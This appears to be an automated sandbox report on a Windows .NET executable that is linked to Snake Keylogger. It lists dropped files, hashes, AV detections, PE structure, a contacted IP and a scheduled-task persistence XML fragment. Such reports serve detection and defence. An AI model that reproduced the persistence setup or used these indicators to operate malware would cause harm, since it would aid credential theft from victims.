                                                                                                                          NIsNyN2CTq.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          PaVWrYb4F2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          No context
                                                                                                                          Process:C:\Users\user\Desktop\Ti5nuRV7y4.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1216
                                                                                                                          Entropy (8bit):5.34331486778365
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84qXKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3ogvitHo6hAHKzea
                                                                                                                          MD5:E193AFF55D4BDD9951CB4287A7D79653
                                                                                                                          SHA1:F94AD920B9E0EB43B5005D74552AB84EAA38E985
                                                                                                                          SHA-256:08DD5825B4EDCC256AEB08525DCBCDA342252A9C9746BE23FBC70A801F5A596E
                                                                                                                          SHA-512:86F6ECDB47C1A7FFA460F3BC6038ACAFC9D4DED4D1E8D1FB7B8FE9145D9D384AB4EE7A7C3BE959A25B265AFEDB8FD31BA10073EC116B65BFE3326EF2C53394E6
                                                                                                                          Malicious:true
                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                                                                                          Process:C:\Users\user\AppData\Roaming\aoTiGLRa.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1216
                                                                                                                          Entropy (8bit):5.34331486778365
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84qXKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3ogvitHo6hAHKzea
                                                                                                                          MD5:E193AFF55D4BDD9951CB4287A7D79653
                                                                                                                          SHA1:F94AD920B9E0EB43B5005D74552AB84EAA38E985
                                                                                                                          SHA-256:08DD5825B4EDCC256AEB08525DCBCDA342252A9C9746BE23FBC70A801F5A596E
                                                                                                                          SHA-512:86F6ECDB47C1A7FFA460F3BC6038ACAFC9D4DED4D1E8D1FB7B8FE9145D9D384AB4EE7A7C3BE959A25B265AFEDB8FD31BA10073EC116B65BFE3326EF2C53394E6
                                                                                                                          Malicious:false
                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2232
                                                                                                                          Entropy (8bit):5.379736180876081
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:tWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//MPUyus:tLHyIFKL3IZ2KRH9Ougss
                                                                                                                          MD5:84D0B3B07B2FABFD5D0F3E724F41E2CE
                                                                                                                          SHA1:8CB94823F1D28AA12678C877E2E1CF0D57CE5C69
                                                                                                                          SHA-256:9F2745B3228D5DCFA4E9B4659F5A2A58A3446B7AECD20294BA34BF3A0312E0E3
                                                                                                                          SHA-512:DAE272A0BB99FAB9A217FD4B448DE9847795636777DE9BA769A087DA5505BBCD5B5C29EE48C1241735A4F4AC9EF61E393B859C138D1F6244DF317A664D93375F
                                                                                                                          Malicious:false
                                                                                                                          Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Users\user\Desktop\Ti5nuRV7y4.exe
                                                                                                                          File Type:XML 1.0 document, ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1602
                                                                                                                          Entropy (8bit):5.114482870542159
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtG5xvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTsv
                                                                                                                          MD5:B3B8CA698C07C5006674032A55AFE692
                                                                                                                          SHA1:CC7CEE4FD37C5CBE60932C309A21065A97611E43
                                                                                                                          SHA-256:3CD141A5830F78185883E11CBAB6502189E1A88CF6BF28D26911B454D095BCE2
                                                                                                                          SHA-512:3CB3355531FD5EA8EAE233A77EF1E3A398E76FF6F4F11E996678CAC3506277BBDFB6D09192E5B639FBD42D6540E25F373726922E22ED6CDE5146343EEF016628
                                                                                                                          Malicious:true
                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.
                                                                                                                          Process:C:\Users\user\AppData\Roaming\aoTiGLRa.exe
                                                                                                                          File Type:XML 1.0 document, ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1602
                                                                                                                          Entropy (8bit):5.114482870542159
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtG5xvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTsv
                                                                                                                          MD5:B3B8CA698C07C5006674032A55AFE692
                                                                                                                          SHA1:CC7CEE4FD37C5CBE60932C309A21065A97611E43
                                                                                                                          SHA-256:3CD141A5830F78185883E11CBAB6502189E1A88CF6BF28D26911B454D095BCE2
                                                                                                                          SHA-512:3CB3355531FD5EA8EAE233A77EF1E3A398E76FF6F4F11E996678CAC3506277BBDFB6D09192E5B639FBD42D6540E25F373726922E22ED6CDE5146343EEF016628
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.
                                                                                                                          Process:C:\Users\user\Desktop\Ti5nuRV7y4.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):766976
                                                                                                                          Entropy (8bit):7.7544359495252
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:/+Cb+eCSmSuo/HOMmO4ClOJwubAYNnv42S829nSQKYiTH/plXEX53:/Ccuo/HODCl/ubAEnS8Un7KxT7u
                                                                                                                          MD5:3C70DF024FF5A65F0785B0075939C3FD
                                                                                                                          SHA1:05D7F92C1A6FEC90BA6AB3A9B08944ADBFE36832
                                                                                                                          SHA-256:228E6F4564FE08C94660250DE5FC8832CE73B21EDAD1E81F6969C9A6DEDBBFA9
                                                                                                                          SHA-512:380B50EF861A900CF97BB3354AF8DDEC0D0FC61751E96E5C3869A646F1E0BE4ADCC493B72292230F7A1FCC536D02D0DCE9ED2A127795A0612B3D37C271925C4E
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...7GEg..............0.............6.... ........@.. ....................... ............@....................................O.......l*........................................................................... ............... ..H............text...<.... ...................... ..`.rsrc...l*.......,..................@..@.reloc..............................@..B........................H........C...Q...........................................................0...........(.....(.....{....&......%.r...p(....s.....%.r...p(....s.....%.r!..p(....s.......{....o.....(...+.r=..p......%...H....%.....(.....s....}....*....0..........s.......{....o....o......{....o....o......{....o....o......{....o....o......{....o....o......{....o....o......{....o....o.....{.....o....,..{.....o....*.{.....o....rK..p(....&*.0..&........{....o.....{.....{....o.....o ......(!...o"....{...
                                                                                                                          Process:C:\Users\user\Desktop\Ti5nuRV7y4.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):26
                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                          Malicious:true
                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Entropy (8bit):7.7544359495252
                                                                                                                          TrID:
                                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                                                          File name:Ti5nuRV7y4.exe
                                                                                                                          File size:766'976 bytes
                                                                                                                          MD5:3c70df024ff5a65f0785b0075939c3fd
                                                                                                                          SHA1:05d7f92c1a6fec90ba6ab3a9b08944adbfe36832
                                                                                                                          SHA256:228e6f4564fe08c94660250de5fc8832ce73b21edad1e81f6969c9a6dedbbfa9
                                                                                                                          SHA512:380b50ef861a900cf97bb3354af8ddec0d0fc61751e96e5c3869a646f1e0be4adcc493b72292230f7a1fcc536d02d0dce9ed2a127795a0612b3d37c271925c4e
                                                                                                                          SSDEEP:12288:/+Cb+eCSmSuo/HOMmO4ClOJwubAYNnv42S829nSQKYiTH/plXEX53:/Ccuo/HODCl/ubAEnS8Un7KxT7u
                                                                                                                          TLSH:0FF40185226AC907E4DA5BB04460E3F563B85ECCB811D3539BFDBDFB7C2A304B549292
                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...7GEg..............0.............6.... ........@.. ....................... ............@................................
                                                                                                                          Icon Hash:322e2e3eee6e2697
                                                                                                                          Entrypoint:0x4ba336
                                                                                                                          Entrypoint Section:.text
                                                                                                                          Digitally signed:false
                                                                                                                          Imagebase:0x400000
                                                                                                                          Subsystem:windows gui
                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                          Time Stamp:0x67454737 [Tue Nov 26 03:57:43 2024 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:4
                                                                                                                          OS Version Minor:0
                                                                                                                          File Version Major:4
                                                                                                                          File Version Minor:0
                                                                                                                          Subsystem Version Major:4
                                                                                                                          Subsystem Version Minor:0
                                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                          Instruction
                                                                                                                          jmp dword ptr [00402000h]
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xba2e40x4f.text
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xbc0000x2a6c.rsrc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xc00000xc.reloc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                          .text0x20000xb833c0xb8400de49671407f6303afc904d83a46f809fFalse0.9149608844979648data7.760400947281738IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                          .rsrc0xbc0000x2a6c0x2c0072a809d57dbb91e5f3cabb26da644481False0.8670099431818182data7.468331500200943IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                          .reloc0xc00000xc0x200e5d6b5486acd60f74e64c69aee5c586dFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                          RT_ICON0xbc1000x241dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9700378583017848
                                                                                                                          RT_GROUP_ICON0xbe5300x14data1.05
                                                                                                                          RT_VERSION0xbe5540x318data0.4431818181818182
                                                                                                                          RT_MANIFEST0xbe87c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                                          DLLImport
                                                                                                                          mscoree.dll_CorExeMain
                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
